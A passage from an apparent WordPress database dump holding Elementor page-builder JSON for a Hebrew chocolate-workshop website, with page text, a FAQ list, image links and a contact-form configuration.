\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1723,354,'_elementor_version','0.4'),(1724,354,'_elementor_template_type','wp-post'),(1726,69,'_elementor_pro_version','2.9.4'),(1729,355,'_wp_page_template','elementor_header_footer'),(1730,355,'_elementor_edit_mode','builder'),(1731,355,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/li><\\/ul><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1732,355,'_elementor_version','2.7.5'),(1733,355,'_elementor_template_type','wp-post'),(1734,355,'_elementor_pro_version','2.7.3'),(1738,356,'_wp_page_template','elementor_header_footer'),(1739,356,'_elementor_edit_mode','builder'),(1740,356,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans 